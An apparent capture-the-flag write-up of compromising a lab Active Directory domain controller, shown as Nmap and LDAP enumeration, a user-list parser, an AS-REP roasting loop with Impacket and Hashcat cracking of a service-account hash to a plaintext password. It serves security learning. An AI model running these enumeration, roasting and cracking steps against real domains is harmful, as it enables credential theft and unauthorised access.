A Path Hidden in Plain Sight: Owning Active Directory
Another day, another hack — and just like that we're back.
Jabaribrown
~20 min read
March 6, 2026 (Updated: March 6, 2026)
Starting with an Nmap scan, of course.
This gives us our first look at what services the machine is exposing and where we might be able to start poking around.
jbrown@Jabaris-MacBook-Pro forest % nmap -sV -sC -O -T4 10.129.1.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 09:10 -0500
Nmap scan report for 10.129.1.13
Host is up (0.037s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-04 14:17:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Device type: general purpose
Running: Microsoft Windows 2016|2019
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2016 or Server 2019
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2026-03-04T06:17:46-08:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-04T14:17:49
|_ start_date: 2026-03-04T13:59:42
|_clock-skew: mean: 2h46m49s, deviation: 4h37m07s, median: 6m49s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds
Now what stands out is LDAP (389), WinRM (5985), and SMB (445). Another thing you'll notice is that we also discovered the domain htb.local, which tells us we're dealing with a Windows domain environment.
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
With WinRM, if we find some credentials we should be able to log in — as long as the user is part of the Remote Management Users group. But before jumping ahead, we'll start by enumerating SMB and LDAP to see if we can find a valid user and hopefully some credentials.
jbrown@Jabaris-MacBook-Pro forest % nxc smb 10.129.1.13 -u anonymous -p ""
SMB 10.129.1.13 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.1.13 445 FOREST [-] htb.local\anonymous: STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro forest % nxc smb 10.129.1.13 -u anonymous -p anonymous
SMB 10.129.1.13 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.1.13 445 FOREST [-] htb.local\anonymous:anonymous STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro forest % nxc smb 10.129.1.13 -u guest -p guest
SMB 10.129.1.13 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.1.13 445 FOREST [-] htb.local\guest:guest STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro forest %
Using NetExec, both anonymous and guest logins fail. So next we can try LDAP to see if anonymous bind is allowed, using windapsearch.py:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.44.121
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
We successfully got an anonymous bind, so let's enumerate a bit more and see what we can pull back:
Groups:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.44.121 -G
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.44.121
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD groups
[+] Found 59 groups:
cn: Users
distinguishedName: CN=Users,CN=Builtin,DC=htb,DC=local
cn: Guests
distinguishedName: CN=Guests,CN=Builtin,DC=htb,DC=local
cn: Remote Desktop Users
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=htb,DC=local
cn: Network Configuration Operators
distinguishedName: CN=Network Configuration Operators,CN=Builtin,DC=htb,DC=local
cn: Performance Monitor Users
distinguishedName: CN=Performance Monitor Users,CN=Builtin,DC=htb,DC=local
cn: Performance Log Users
distinguishedName: CN=Performance Log Users,CN=Builtin,DC=htb,DC=local
cn: Distributed COM Users
distinguishedName: CN=Distributed COM Users,CN=Builtin,DC=htb,DC=local
cn: IIS_IUSRS
distinguishedName: CN=IIS_IUSRS,CN=Builtin,DC=htb,DC=local
cn: Cryptographic Operators
distinguishedName: CN=Cryptographic Operators,CN=Builtin,DC=htb,DC=local
cn: Event Log Readers
distinguishedName: CN=Event Log Readers,CN=Builtin,DC=htb,DC=local
cn: Certificate Service DCOM Access
distinguishedName: CN=Certificate Service DCOM Access,CN=Builtin,DC=htb,DC=local
cn: RDS Remote Access Servers
distinguishedName: CN=RDS Remote Access Servers,CN=Builtin,DC=htb,DC=local
cn: RDS Endpoint Servers
distinguishedName: CN=RDS Endpoint Servers,CN=Builtin,DC=htb,DC=local
cn: RDS Management Servers
distinguishedName: CN=RDS Management Servers,CN=Builtin,DC=htb,DC=local
cn: Hyper-V Administrators
distinguishedName: CN=Hyper-V Administrators,CN=Builtin,DC=htb,DC=local
cn: Access Control Assistance Operators
distinguishedName: CN=Access Control Assistance Operators,CN=Builtin,DC=htb,DC=local
cn: Remote Management Users
distinguishedName: CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
cn: System Managed Accounts Group
distinguishedName: CN=System Managed Accounts Group,CN=Builtin,DC=htb,DC=local
cn: Storage Replica Administrators
distinguishedName: CN=Storage Replica Administrators,CN=Builtin,DC=htb,DC=local
cn: Domain Computers
distinguishedName: CN=Domain Computers,CN=Users,DC=htb,DC=local
cn: Cert Publishers
distinguishedName: CN=Cert Publishers,CN=Users,DC=htb,DC=local
cn: Domain Users
distinguishedName: CN=Domain Users,CN=Users,DC=htb,DC=local
cn: Domain Guests
distinguishedName: CN=Domain Guests,CN=Users,DC=htb,DC=local
cn: Group Policy Creator Owners
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
cn: RAS and IAS Servers
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local
cn: Pre-Windows 2000 Compatible Access
distinguishedName: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=htb,DC=local
cn: Incoming Forest Trust Builders
distinguishedName: CN=Incoming Forest Trust Builders,CN=Builtin,DC=htb,DC=local
cn: Windows Authorization Access Group
distinguishedName: CN=Windows Authorization Access Group,CN=Builtin,DC=htb,DC=local
cn: Terminal Server License Servers
distinguishedName: CN=Terminal Server License Servers,CN=Builtin,DC=htb,DC=local
cn: Allowed RODC Password Replication Group
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
cn: Denied RODC Password Replication Group
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
cn: Enterprise Read-only Domain Controllers
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
cn: Cloneable Domain Controllers
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
cn: Protected Users
distinguishedName: CN=Protected Users,CN=Users,DC=htb,DC=local
cn: Key Admins
distinguishedName: CN=Key Admins,CN=Users,DC=htb,DC=local
cn: Enterprise Key Admins
distinguishedName: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
cn: DnsAdmins
distinguishedName: CN=DnsAdmins,CN=Users,DC=htb,DC=local
cn: DnsUpdateProxy
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
cn: Organization Management
distinguishedName: CN=Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Recipient Management
distinguishedName: CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: View-Only Organization Management
distinguishedName: CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Public Folder Management
distinguishedName: CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: UM Management
distinguishedName: CN=UM Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Help Desk
distinguishedName: CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Records Management
distinguishedName: CN=Records Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Discovery Management
distinguishedName: CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Server Management
distinguishedName: CN=Server Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Delegated Setup
distinguishedName: CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Hygiene Management
distinguishedName: CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Compliance Management
distinguishedName: CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Security Reader
distinguishedName: CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Security Administrator
distinguishedName: CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Servers
distinguishedName: CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Trusted Subsystem
distinguishedName: CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Managed Availability Servers
distinguishedName: CN=Managed Availability Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Windows Permissions
distinguishedName: CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: ExchangeLegacyInterop
distinguishedName: CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Install Domain Servers
distinguishedName: CN=Exchange Install Domain Servers,CN=Microsoft Exchange System Objects,DC=htb,DC=local
cn: test
distinguishedName: CN=test,OU=Security Groups,DC=htb,DC=local
[*] Bye!
Users:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.44.121 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.44.121
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 28 users:
cn: Guest
cn: DefaultAccount
cn: Exchange Online-ApplicationAccount
userPrincipalName: [email protected]
cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
cn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
cn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
cn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
cn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
userPrincipalName: [email protected]
cn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
userPrincipalName: [email protected]
cn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
cn: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
userPrincipalName: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local
cn: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
userPrincipalName: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local
cn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: [email protected]
cn: HealthMailboxfc9daad117b84fe08b081886bd8a5a50
userPrincipalName: [email protected]
cn: HealthMailboxc0a90c97d4994429b15003d6a518f3f5
userPrincipalName: [email protected]
cn: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
userPrincipalName: [email protected]
cn: HealthMailbox968e74dd3edb414cb4018376e7dd95ba
userPrincipalName: [email protected]
cn: HealthMailbox6ded67848a234577a1756e072081d01f
userPrincipalName: [email protected]
cn: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
userPrincipalName: [email protected]
cn: HealthMailboxfd87238e536e49e08738480d300e3772
userPrincipalName: [email protected]
cn: HealthMailboxb01ac647a64648d2a5fa21df27058a24
userPrincipalName: [email protected]
cn: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
userPrincipalName: [email protected]
cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: [email protected]
cn: Sebastien Caron
userPrincipalName: [email protected]
cn: Lucinda Berger
userPrincipalName: [email protected]
cn: Andy Hislip
userPrincipalName: [email protected]
cn: Mark Brandt
userPrincipalName: [email protected]
cn: Santi Rodriguez
userPrincipalName: [email protected]
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -U --custom "objectClass=*"
***LARGE SNIP****
OU=Service Accounts,DC=htb,DC=local
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
***LARGE SNIP****
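The next step takes the names from the windapsearch dump above and turns them into a users list. As an added example (my own code, not the author's or the windapsearch project's), here is a small parser for the `cn:` / `userPrincipalName:` layout that `windapsearch.py -U` prints, which pulls the username out of the UPN and, optionally, drops the Exchange system mailboxes that a domain like this one is full of. The sample input is constructed in that shape; the UPN local parts are assumed, since the page shows them redacted.

```python
# Added example: build a username list from windapsearch.py -U style output.
# The sample below is constructed to match that layout; the UPN local parts
# (sebastien, lucinda) are assumed, not taken from the page.
SAMPLE_OUTPUT = """\
[+] Found 6 users:
cn: Guest
cn: DefaultAccount
cn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local
cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
cn: Sebastien Caron
userPrincipalName: sebastien@htb.local
cn: Lucinda Berger
userPrincipalName: lucinda@htb.local
[*] Bye!
"""

# Common-name prefixes of Exchange-managed system accounts seen in the dump.
EXCHANGE_PREFIXES = (
    "HealthMailbox", "SystemMailbox", "DiscoverySearchMailbox",
    "Migration.", "FederatedEmail.", "Exchange Online-",
)


def parse_users(text):
    """Return a list of (cn, userPrincipalName-or-None) tuples.

    windapsearch prints one `cn:` line per user followed, when the
    attribute is set, by a `userPrincipalName:` line, so a UPN always
    belongs to the most recent cn.
    """
    users = []
    current = None
    for line in text.splitlines():
        if line.startswith("cn: "):
            current = [line[len("cn: "):].strip(), None]
            users.append(current)
        elif line.startswith("userPrincipalName: ") and current is not None:
            current[1] = line[len("userPrincipalName: "):].strip()
    return [tuple(u) for u in users]


def usernames(text, skip_exchange=True):
    """Usernames in the form Kerberos tools want (the UPN local part).

    Accounts without a UPN (Guest, DefaultAccount) fall back to their cn.
    Exchange system mailboxes are skipped unless skip_exchange is False.
    """
    names = []
    for cn, upn in parse_users(text):
        if skip_exchange and cn.startswith(EXCHANGE_PREFIXES):
            continue
        name = upn.split("@", 1)[0] if upn else cn
        if name not in names:          # keep order, drop duplicates
            names.append(name)
    return names


def write_user_list(path, names):
    """Write one username per line, the format the GetNPUsers loop reads."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    for name in usernames(SAMPLE_OUTPUT):
        print(name)
```

The filter is a convenience, not a rule: the author ran the Exchange mailboxes through the loop too, and nothing is lost by keeping them (`skip_exchange=False`) other than a few extra Kerberos requests, each of which a DC logs as event 4768.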
Now we can try an AS-REP roasting attack. We'll take the usernames we found and put them into a users list. Once we have that list, we can use Impacket's GetNPUsers.py to query Kerberos and check if any accounts have "Do not require Kerberos preauthentication" set. If they do, we can grab the AS-REP hash for offline cracking:
jbrown@Jabaris-MacBook-Pro examples % while read r; do python3 GetNPUsers.py htb.local/"$r" -request -no-pass -dc-ip 10.129.1.13;done < ../../../forest/users.txt
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for andy
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for mark
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for santi
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for Exchange_Online-ApplicationAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for Migration.8f3e7716-2011-43e4-96b1-aba62d229136
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
[-] User HealthMailboxc3d7722415ad41a5b19e3e00e165edbe doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxfc9daad117b84fe08b081886bd8a5a50
[-] User HealthMailboxfc9daad117b84fe08b081886bd8a5a50 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxc0a90c97d4994429b15003d6a518f3f5
[-] User HealthMailboxc0a90c97d4994429b15003d6a518f3f5 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
[-] User HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox968e74dd3edb414cb4018376e7dd95ba
[-] User HealthMailbox968e74dd3edb414cb4018376e7dd95ba doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox6ded67848a234577a1756e072081d01f
[-] User HealthMailbox6ded67848a234577a1756e072081d01f doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
[-] User HealthMailbox83d6781be36b4bbf8893b03c2ee379ab doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxfd87238e536e49e08738480d300e3772
[-] User HealthMailboxfd87238e536e49e08738480d300e3772 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxb01ac647a64648d2a5fa21df27058a24
[-] User HealthMailboxb01ac647a64648d2a5fa21df27058a24 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
[-] User HealthMailbox7108a4e350f84b32a7a90d8e718f78cf doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
[-] User HealthMailbox0659cc188f4c4f9f978f6c2142c4181e doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for svc-alfresco
[email protected]:33270a0ccbfccb67a03fb37a5dc256f8$7d10ab1f7c648e710b079fd6b2767c65c35b324b5c78965b510b1e1e7e4b652d701a2d4ceb2b5d0d1a2f18d620f4057c2526f49f5e7a291cb15af412e5ee55e8cfbabec918022b5f4896f8db5cc6c01e9c732d2b3210557649ef0c963035cf21e2593c02ace6e8b725f89f12f1cc57515e4d7db9af8f9bb1c3de72501e218251bcc86146cd669b91e6458303b1f6e089dda01dba8a12bca26486b800ae440bd7b0197031c677f6a86894cb8fda2a7f5d9d698efb3e6c2f5d7245d9428ddbd48c635561e95f50074ee67ce6daa5fedc4243f0c9fd801ccfda389ad7b50ad15b53da9220d86986
jbrown@Jabaris-MacBook-Pro examples %
Now that we have the AS-REP hash, we can use Hashcat to try and crack it to recover the password for the service account.
NOTE: Mode 18200 is Kerberos 5 AS-REP etype 23 ($krb5asrep$23$), the RC4-HMAC hash format.
jbrown@Jabaris-MacBook-Pro hashcat % ./hashcat -m 18200 ../../forest/hash.txt ../../wordlist/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting
METAL API (Metal 368.52)
========================
* Device #01: Apple M2, skipped
OpenCL API (OpenCL 1.2 (Jul 20 2025 19:29:12)) - Platform #1 [Apple]
====================================================================
* Device #02: Apple M2, GPU, 2730/5461 MB (512 MB allocatable), 10MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 100c
Host memory allocated for this attack: 599 MB (1100 MB free)
Dictionary cache hit:
* Filename..: ../../wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
[email protected]:33270a0ccbfccb67a03fb37a5dc256f8$7d10ab1f7c648e710b079fd6b2767c65c35b324b5c78965b510b1e1e7e4b652d701a2d4ceb2b5d0d1a2f18d620f4057c2526f49f5e7a291cb15af412e5ee55e8cfbabec918022b5f4896f8db5cc6c01e9c732d2b3210557649ef0c963035cf21e2593c02ace6e8b725f89f12f1cc57515e4d7db9af8f9bb1c3de72501e218251bcc86146cd669b91e6458303b1f6e089dda01dba8a12bca26486b800ae440bd7b0197031c677f6a86894cb8fda2a7f5d9d698efb3e6c2f5d7245d9428ddbd48c635561e95f50074ee67ce6daa5fedc4243f0c9fd801ccfda389ad7b50ad15b53da9220d86986:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:33270a0ccbfccb...d86986
Time.Started.....: Fri Mar 6 07:27:56 2026 (1 sec)
Time.Estimated...: Fri Mar 6 07:27:57 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (../../wordlist/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 9103.7 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4259840/14344384 (29.70%)
Rejected.........: 0/4259840 (0.00%)
Restore.Point....: 3932160/14344384 (27.41%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: seaford12 -> rideordie06
Hardware.Mon.SMC.: Fan0: 0%
Hardware.Mon.#02.: Util: 86% Pwr:641mW
Started: Fri Mar 6 07:27:55 2026
Stopped: Fri Mar 6 07:27:57 2026
jbrown@Jabaris-MacBook-Pro hashcat %
And now we have the password. With this, we can narrow in on our enumeration. We can use the service account username and password with windapsearch.py to see what groups it's a part of and check for any other attributes that might be useful:
